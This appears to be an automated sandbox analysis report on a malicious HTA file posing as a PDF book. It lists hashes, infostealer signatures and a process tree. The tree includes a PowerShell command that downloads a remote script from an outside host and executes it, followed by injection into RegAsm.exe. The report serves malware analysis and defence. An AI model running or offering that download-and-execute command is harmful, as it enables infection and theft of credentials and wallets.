Analysis
max time kernel: 148s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20240412-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240412-en, locale:en-us, os:windows10-2004-x64, system
submitted: 19-04-2024 17:32
Static task: static1
General
Target: Book_PDF_a4_id_456543243432.hta
Size: 46KB
MD5: 5fbdd6357b961e941acd3c06ba2e867e
SHA1: ac1f9b5ffd9c6fa8790bf235f73bd53f699c527b
SHA256: f135e8b3678ef36330cc8e8f1986cf40d83fb4159c8d5363ba44b78d14f85f17
SHA512: c63211263355c854c19964c37cd9857e08a90a694e087bfe6e5c1d35cc579ae75b9e5c5279172c8b24ce925a3476408ded33a32d09f7cc5b820e0cbd1dbb2907
SSDEEP: 768:2bang59+ttT+fEV8yEH445wBodvJdgg6i1UY8o53YH:2baXLWEXEp5wcdgziK/H
Malware Config
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
  Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 436 | 740 | powershell.exe

Blocklisted process makes network request (1 IoC)
Processes (flow | pid | process):
  14 | 436 | powershell.exe

Reads data files stored by FTP clients (2 TTPs)
Tries to access configuration files associated with programs like FileZilla.

Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Suspicious behavior: EnumeratesProcesses (2 IoCs)
Processes (pid | process):
  436 | powershell.exe
  436 | powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes (description | pid | process):
  Token: SeDebugPrivilege | 436 | powershell.exe

Suspicious use of WriteProcessMemory (8 IoCs)
Processes (description | pid | process | target process):
  PID 436 wrote to memory of 2124 | 436 | powershell.exe | csc.exe
  PID 436 wrote to memory of 2124 | 436 | powershell.exe | csc.exe
  PID 2124 wrote to memory of 3676 | 2124 | csc.exe | cvtres.exe
  PID 2124 wrote to memory of 3676 | 2124 | csc.exe | cvtres.exe
  PID 436 wrote to memory of 2932 | 436 | powershell.exe | RegAsm.exe
  PID 436 wrote to memory of 2932 | 436 | powershell.exe | RegAsm.exe
  PID 436 wrote to memory of 2932 | 436 | powershell.exe | RegAsm.exe
  PID 436 wrote to memory of 2932 | 436 | powershell.exe | RegAsm.exe
Processes (process tree; indentation shows parent/child depth)

C:\Windows\SysWOW64\mshta.exe
  command line: C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\Book_PDF_a4_id_456543243432.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
  PID: 2876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  command line: powershell -Command irm https://sevensunday.co.ke/tete/describe.tet | iex
  PID: 436
  signatures: Process spawned unexpected child process; Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      command line: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\va3syipp\va3syipp.cmdline"
      PID: 2124
      signatures: Suspicious use of WriteProcessMemory

        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES37AA.tmp" "c:\Users\Admin\AppData\Local\Temp\va3syipp\CSC8904E7638F2F4BA6811C6441F9AAA635.TMP"
          PID: 3676

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      PID: 2932
Network
MITRE ATT&CK Enterprise v15
Downloads